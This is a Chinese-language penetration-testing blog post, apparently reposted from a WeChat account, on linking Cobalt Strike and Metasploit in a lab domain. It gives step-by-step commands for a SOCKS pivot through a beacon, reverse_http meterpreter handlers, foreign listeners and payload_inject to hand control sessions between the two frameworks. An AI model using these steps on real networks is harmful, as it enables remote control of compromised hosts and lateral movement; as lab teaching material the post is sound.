内网渗透-CS与MSF联动

  • A+
所属分类:安全文章


一位苦于信息安全的萌新小白帽

本实验仅用于信息防御教学,切勿用于它用途

公众号:XG小刚


CS与MSF联动


在渗透测试过程中,尤其是搞内网时候,用的最多的是CSMSF
虽然这俩源头一样,现在CS单独分离了出来,但他们之间是可以互相连通的。

如何实现CSMSF之间的连通呢?下面将聊一聊。

环境
域环境:
DC:10.10.10.2(内网域控)
DWin7:10.10.10.3(能通外网)
DWin2k8:10.10.10.4(能通外网)
一台外网VPS搭载的CS
一台外网VPS用Docker搭载的MSF

1.CS代理给MSF


CS已经有了一台上线主机,通过CS开放一个socks代理,让msf连接此代理进行攻击内网

步骤:
CS上线主机上运行
beacon > socks 1789
在菜单栏点击view > proxy pirots
setg Proxies socks4:x.x.x.x:1789
开启msf,复制链接到msf进行设置代理
//msf所有流量将走此代理msf6 > setg Proxies socks4:x.x.x.x:1789//设置允许反向代理,也就是建立双向通道,通过socks反弹shellmsf6 > setg ReverseAllowProxy true
然后可以利用msf的各种模块探测、攻击内网了。

2.CS上线主机给MSF



CS有了一个上线主机,想把这个主机发送给msf,生成一个meterpreter的控制会话

步骤:
打开MSF,开始监听
msf6 > use exploit/multi/handlermsf6 > set payload windows/meterpreter/reverse_http\不要用64位msf6 > set lhost 172.17.0.2msf6 > set lport 8080msf6 > run
然后在CS上设置一个foreign监听器msf
IP设置为msf的外网IP,端口也设置为msf监听的端口

CS上线主机运行
beacon > Spawn msf
或者右键->Spawn:选择msf的监听器
然后msf已经上线,生成一个meterpreter控制的会话。

3.MSF上线主机给CS


MSF有了一个session会话,想把这个会话发送给CS生成上线主机

步骤:
CS中创建一个监听,这里的监听器类型啊windows/beaconhttp/reversehttp
这里host修改为CS的IP,监听8899端口,等待msf发送。

msf中,将session挂到后台id为2
meterpreter > background
使用模块payload_inject,执行之后会在本地产生一个新的handler
msf6 > use exploit/windows/local/payload_injectmsf6 > set DisablePayloadHandler true
由于msf有了一个会话,所以不需要在产生一个,这里我们设置DisablePayloadHandler为true
msf6 > set payload windows/meterpreter/reverse_httpmsf6 > set lhost x.x.x.xmsf6 > set lport 8899msf6 > set session 2msf6 > run
CS就上线了

附视频操作

视频中间断开了,连着看就行



这俩工具别的连通方式还是挺多的,具体看你对这俩工具的使用程度了。

本文始发于微信公众号(XG小刚):内网渗透-CS与MSF联动

发表评论